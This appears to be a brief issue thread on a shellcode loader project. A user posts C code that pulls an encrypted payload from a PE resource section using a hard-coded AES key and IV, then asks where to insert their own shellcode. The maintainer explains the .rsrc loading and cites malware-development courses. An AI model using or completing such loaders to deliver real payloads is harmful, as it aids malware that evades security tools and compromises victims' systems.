loader

[sec13b]

can i know what load ?

    char * payload;

    payload = (char *) LockResource(resHandle);

    int payload_len = SizeofResource(NULL, res);

    unsigned char AesKey[] = {
        0xF7, 0xA8, 0x64, 0xF4, 0x6A, 0x47, 0xDF, 0xBD, 0xA6, 0x11, 0x4B, 0x5D, 0x54, 0x99, 0x3C, 0x2E, 
        0x38, 0x24, 0x38, 0xAA, 0xB7, 0x15, 0x60, 0x7E, 0x96, 0xA8, 0x52, 0xDF, 0x04, 0xE3, 0x4F, 0x21 };

    unsigned char AesIv[] = {
        0x38, 0xC6, 0x7E, 0x1C, 0x24, 0xD6, 0x0F, 0x67, 0x82, 0x3C, 0xA2, 0x9F, 0x47, 0xE4, 0x05, 0xA8 };

    //SimpleDecryption(payload, payload_len, AesKey, AesIv, &pPlaintext, &dwPlainSize);

thank you

[tehstoni]

are you asking what is being loaded? or what exactly.

[sec13b]

I dont see where i need add "my" shellcode

[tehstoni]

this one loads the payload from the .rsrc section of the PE. maldev academy and sektor7 essentials both teach how to do this.